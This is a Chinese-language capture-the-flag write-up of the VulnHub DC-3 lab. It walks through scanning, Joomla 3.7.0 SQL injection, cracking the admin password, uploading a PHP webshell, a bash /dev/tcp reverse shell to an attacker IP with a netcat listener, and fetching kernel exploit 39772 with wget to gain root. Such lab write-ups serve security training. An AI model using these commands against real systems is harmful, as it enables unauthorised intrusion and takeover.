vulnhub DC-3
0X01 Main Point
1.**searchsploit**的使用
2.**网站指纹识别**(Wappalyzer插件)
3.Netcat(反弹shell)初步和下载脚本提权
4.探测Linux内核版本进行攻击得到root权限
0X02 前期嗅探和端口探测
kali下使用arp-scan获取靶机IP,使用nmap探测端口开放,只有80端口开放。


先从网站入手看看有什么新发现。

日常dirsearch跑目录,扫后台。

这里先看/README.txt发现了该网站是joomla的CMS,并且得到后台路径。
这里介绍一下Chorme的插件Wappalyzer,Wappalyzer是一款浏览器插件,通过Wappalyzer可以识别出网站采用了那种web技术。它能够检测出CMS和电子商务系统、留言板、javascript框架,主机面板,分析统计工具和其它的一些web系统。The company behind Wappalyzer还能够收集web程序的一些信息用于统计分析,揭示出各种web系统的使用率即增长情况。实际Wappalyzer就是一个指纹识别工具。

可见通过网站指纹识别也能够判断出,下面针对joomla搜寻可以利用的漏洞,msf启动。利用msf中的joomla版本检测发现是joomla 3.7.0的版本

searchsploit发现了一个3.7.0版本的SQL注入漏洞:

这里可以直接利用此漏洞进行SQL注入,可以得出是Mysql数据库,下面就是爆库爆表爆字段,下面是有用的信息:

得到admin账户的Hash加密的密码,使用kali自带的John爆破看是否能够得到明文密码,注意:john工具对于同一个shadow文件只会进行一次爆破,如果第二次执行john shadow是不会得到结果的。由于是第二次查看,使用
--show
命令查看即可。
得到admin的明文密码snoopy。根据dirsearch扫到的后台登录。既然是管理员,那就有上传的功能,我们的思路就是先得到Webshell,然后连接后虚拟终端进行反弹Shell,最后得到低权限shell后在进行提权。
在beezs
模板下上传shell.php
内容就是常规的PHP一句话。

可以看到成功上传shell.php,[^1]蚁剑连接。
[^1]这里我这个版本的菜刀一直连不上,但是蚁剑却可以成功连上,有大佬知道原因可以滴滴我,就先用蚁剑连上。
利用虚拟终端进行反弹shell,也可以直接上传PHP直接得到反弹shell,我这里使用前者。
蚁剑虚拟终端 bash -c 'bash -i >& /dev/tcp/172.20.10.8/2333 0>&1'
kali终端 nc -lvvp 2333
成功Listening



lsb_release -a
查看当前Linux发行系统版本,uname -an
查看内核版本。
- lsb_release -a :FSG(Free Standards Group)组织开发的LSB (Linux Standard Base)标准的一个命令,用来查看linux兼容性的发行版信息。
-/proc/version 和 uname -a 显示的内容相同,显示linux内核版本号。
搜索关键词即可得到提权脚本,我们使用39772.txt
这个是经过认证的,效果更好。
找到提供的镜像,wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
下载到/tmp
路径,unzip 39772.zip
进行解压,tar -xvf exploit.tar
进行解压,接下来根据39772.txt
里的usage
进行逐步操作即可。

得到root权限,最终得到flag,并且可以创建root用户,以登录虚拟机,后面的操作就不再赘述。
